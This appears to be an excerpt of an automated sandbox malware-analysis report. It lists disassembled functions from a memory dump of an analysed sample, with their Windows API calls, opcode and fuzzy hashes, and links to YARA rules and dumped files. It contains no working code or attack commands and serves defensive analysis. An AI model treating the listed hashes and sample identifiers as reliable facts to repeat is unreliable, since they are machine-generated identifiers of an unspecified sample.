                                                                              • API String ID: 3519838083-0
                                                                              • Opcode ID: 43957608f8bac81f347b347ca02f571313ec37e718d16030d0c7370cbd0c3861
                                                                              • Instruction ID: 717e00d30c0f4d8187166f2271abf1018cffcee2a2ffb0a034788d8f752e3cf8
                                                                              • Opcode Fuzzy Hash: 43957608f8bac81f347b347ca02f571313ec37e718d16030d0c7370cbd0c3861
                                                                              • Instruction Fuzzy Hash: 9821AE75C04229AFCF15DF94D841AEEB7B4FF14304F0440AAE805B7201D7756A45EB70
                                                                              Function 00D4BE58 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00D4BEB8
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID:
                                                                              • API String ID: 190572456-0
                                                                              • Opcode ID: 891f940218829ec52d42be67e2e6cdc7f86e6c5f6491809c2982898f2c91c94c
                                                                              • Instruction ID: e20cea6c7c670074d7dd4ea346bb8a4882e3d8a78f5535df46d8c1d21d5e6ec1
                                                                              • Opcode Fuzzy Hash: 891f940218829ec52d42be67e2e6cdc7f86e6c5f6491809c2982898f2c91c94c
                                                                              • Instruction Fuzzy Hash: 94119133A006655F9B21DE29DC518EB77A59BD433071A4232FE55EB254DB70EC418BF0
                                                                              Function 00D2A475 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID:
                                                                              • API String ID: 3519838083-0
                                                                              • Opcode ID: bafaa87c0419b27f9df33429e14dbfd4e149989ca84568695ee24ab657b046eb
                                                                              • Instruction ID: 09102a77ae83ad0e96bb1d9e1c54207e189fb8ce02cbf941474b3352de9c4735
                                                                              • Opcode Fuzzy Hash: bafaa87c0419b27f9df33429e14dbfd4e149989ca84568695ee24ab657b046eb
                                                                              • Instruction Fuzzy Hash: 8A11C432900539978B11EE6CE8859AEB775EF54708F05411AF819A7201DB74DC0286B1
                                                                              Function 00D3EBA2 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00D3EBA7
                                                                                • Part of subcall function 00D31983: _wcslen.LIBCMT ref: 00D31999
                                                                                • Part of subcall function 00D28823: __EH_prolog.LIBCMT ref: 00D28828
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog$_wcslen
                                                                              • String ID:
                                                                              • API String ID: 2838827086-0
                                                                              • Opcode ID: 9055bbdd6560930b5f706734063a67b0ef25026ac2a9c8b98cbe91daaa0cef5e
                                                                              • Instruction ID: 55a3d36f4cd5e6e10c8044d1927bc6a880cae12972798396f64af5ec5f9fdd71
                                                                              • Opcode Fuzzy Hash: 9055bbdd6560930b5f706734063a67b0ef25026ac2a9c8b98cbe91daaa0cef5e
                                                                              • Instruction Fuzzy Hash: 8911B2325093949ED740AB68AC06B987FB4EB24314F00805EE55C92392EFB156888F72
                                                                              Function 00D4D639 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D4C2F6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D4A543,00000001,00000364,?,00D45281,00000050,?,00D63070,00000200), ref: 00D4C337
                                                                              • _free.LIBCMT ref: 00D4D6A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap_free
                                                                              • String ID:
                                                                              • API String ID: 614378929-0
                                                                              • Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                                                              • Instruction ID: 03170dc060fd0d2279df1d8cd916b804502ef9d3b6cf0e9abb39e8887c9e70ea
                                                                              • Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                                                              • Instruction Fuzzy Hash: BA01FE732003499BE3218F59DC41D5AFBD9FB95370F2A051DE5D8532C0E670A905C778
                                                                              Function 00D4C2F6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D4A543,00000001,00000364,?,00D45281,00000050,?,00D63070,00000200), ref: 00D4C337
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 04e0fa9716089f5d7a694caa326efc08f3d52fb1b82edf958a435869ba6a7f02
                                                                              • Instruction ID: dd8f2e487d3f52cedc7c643e7f6b341b798fa53f51daeefbcb0d408dabe37a81
                                                                              • Opcode Fuzzy Hash: 04e0fa9716089f5d7a694caa326efc08f3d52fb1b82edf958a435869ba6a7f02
                                                                              • Instruction Fuzzy Hash: 93F0E232626224A7DFB11F2AAC0AB5B3788DF817A1B18E021FC48E7190DA20DD0092F5
                                                                              Function 00D4A7FE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D4DBEC,00000000,?,00D480B1,?,00000008,?,00D4A871,?,?,?), ref: 00D4A830
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: cdf851283bfd71f64c62eb3301a72b5b965cc262efca0f9e318769a46da2ba28
                                                                              • Instruction ID: 32c9e3bed2f919e7eb4eed419c3a6191f6478cdadb8dc07b29eacc99e2b73275
                                                                              • Opcode Fuzzy Hash: cdf851283bfd71f64c62eb3301a72b5b965cc262efca0f9e318769a46da2ba28
                                                                              • Instruction Fuzzy Hash: B7E06D7228422257E631266EAC01B6B3A88DB527A1F190120BC4596292DB22CC12C3F7
                                                                              Function 00D2B966 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D2BA94: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D2B98B,000000FF,?,?), ref: 00D2BABD
                                                                                • Part of subcall function 00D2BA94: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00D2B98B,000000FF,?,?), ref: 00D2BAEB
                                                                                • Part of subcall function 00D2BA94: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D2B98B,000000FF,?,?), ref: 00D2BAF7
                                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D2B991
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1464966427-0
                                                                              • Opcode ID: 69316ecf03234db681889c7b724df886d24e27eca3cb3f41b0ae59be4a293bf0
                                                                              • Instruction ID: 15168e151eb7e2c9183e30684db09129e19b18feea203a9ac2e5351d1e29a408
                                                                              • Opcode Fuzzy Hash: 69316ecf03234db681889c7b724df886d24e27eca3cb3f41b0ae59be4a293bf0
                                                                              • Instruction Fuzzy Hash: 5EF089310087A0AACB2217B468057D77B909F3A33DF148A4AF2FD522D2C3F450D59B32
                                                                              Function 00D32128 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00D3215D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ExecutionStateThread
                                                                              • String ID:
                                                                              • API String ID: 2211380416-0
                                                                              • Opcode ID: e8f87a69511e5a552f1a340dd8da7665537cf8aa28df1dc4e579ba0ec36f6746
                                                                              • Instruction ID: 9e19eb92f12f59b2b993bceb3e21e8fb251693437649557c6598b03c095b0122
                                                                              • Opcode Fuzzy Hash: e8f87a69511e5a552f1a340dd8da7665537cf8aa28df1dc4e579ba0ec36f6746
                                                                              • Instruction Fuzzy Hash: 41D05B21F1822053DB66373C7856BFD1A569FD6329F1D00A6F609673D3CB54094792B2
                                                                              Function 00D3B636 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00D3B63C
                                                                                • Part of subcall function 00D3B3C8: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D3B3E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                                              • String ID:
                                                                              • API String ID: 1915507550-0
                                                                              • Opcode ID: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
                                                                              • Instruction ID: 2fb81b186717857837e8821cf54dc7dbe00918d585523b133a9ca9707f911ce1
                                                                              • Opcode Fuzzy Hash: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
                                                                              • Instruction Fuzzy Hash: 47D0C73061420976DF416B619C03A7E7695DB10354F008137BA4599191EBB1D9605575
                                                                              Function 00D3F747 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DloadProtectSection.DELAYIMP ref: 00D3F76F
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: DloadProtectSection
                                                                              • String ID:
                                                                              • API String ID: 2203082970-0
                                                                              • Opcode ID: 5b962bc4875a070ccbff94875e0209e95be48430defe6f0b7ff55258e44ac26d
                                                                              • Instruction ID: 0cf3d7c3546a66236ae77106862029f68fa18bd1a5ff0c49ea53ce86c8c60648
                                                                              • Opcode Fuzzy Hash: 5b962bc4875a070ccbff94875e0209e95be48430defe6f0b7ff55258e44ac26d
                                                                              • Instruction Fuzzy Hash: 70D012B0D5030C9DC211EB349C4672822A8F30CB19F540531F5C9C23A1C7E0A544CB71
                                                                              Function 00D3EEBD Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00D32E88), ref: 00D3EEE2
                                                                                • Part of subcall function 00D3C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D3C769
                                                                                • Part of subcall function 00D3C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3C77A
                                                                                • Part of subcall function 00D3C758: IsDialogMessageW.USER32(000204C8,?), ref: 00D3C78E
                                                                                • Part of subcall function 00D3C758: TranslateMessage.USER32(?), ref: 00D3C79C
                                                                                • Part of subcall function 00D3C758: DispatchMessageW.USER32(?), ref: 00D3C7A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                              • String ID:
                                                                              • API String ID: 897784432-0
                                                                              • Opcode ID: abce4a3a6fd16878e9a278904e4113d8eba3085f986fb3732c409c658a9c5c21
                                                                              • Instruction ID: 4ed2f77e3407021ca808e7a8b3e040744c5df69203a4508369021ac397c494c1
                                                                              • Opcode Fuzzy Hash: abce4a3a6fd16878e9a278904e4113d8eba3085f986fb3732c409c658a9c5c21
                                                                              • Instruction Fuzzy Hash: DFD09E76154340AADA022B51DD06F0A7AE2FB98B05F005554B289740F1C6A29D21AF32
                                                                              Function 00D2AB1C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileType.KERNELBASE(000000FF,00D2AA1E), ref: 00D2AB28
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: FileType
                                                                              • String ID:
                                                                              • API String ID: 3081899298-0
                                                                              • Opcode ID: 09fd1bb40e7f7d4bf2f4fab5a3491ef902283a9e2d2f34edf4fe6c8514059250
                                                                              • Instruction ID: 002d2ec029d8e5edc70526c9aa9f47c3322b1a56f7c3ec7af29564138bd8ef9d
                                                                              • Opcode Fuzzy Hash: 09fd1bb40e7f7d4bf2f4fab5a3491ef902283a9e2d2f34edf4fe6c8514059250
                                                                              • Instruction Fuzzy Hash: 6AC01234400215874E300A2CB8540557623EB623BE7B89395C074C50A1C3228C83E523
                                                                              Function 00D3F3DC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: a7d1b2d273c03ce22502c7c6cdd12ced7e390c65ecae31e86b3dc7b77fba3730
                                                                              • Instruction ID: b18ce296aff615ca80aa4e54f7bef2c9cbac6e17010bd85e41c44da7cf418f01
                                                                              • Opcode Fuzzy Hash: a7d1b2d273c03ce22502c7c6cdd12ced7e390c65ecae31e86b3dc7b77fba3730
                                                                              • Instruction Fuzzy Hash: ECB0129166B6067D3684A3143C17F3A121DC4C0F11B30413FF840C0140D4404C495731
                                                                              Function 00D3F3C8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: b2041ff0c2ea8cada6889c647e0856b5014bdff4d68c131b3f64a834335499dc
                                                                              • Instruction ID: bd099bc27a1c97aef5e99984999617687bd190671faa8eba8df1838d71997c9f
                                                                              • Opcode Fuzzy Hash: b2041ff0c2ea8cada6889c647e0856b5014bdff4d68c131b3f64a834335499dc
                                                                              • Instruction Fuzzy Hash: A9B012916691067D3644A3153C07F3A121DC4C0F11730403FF840C4144D4404D095631
                                                                              Function 00D3F396 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
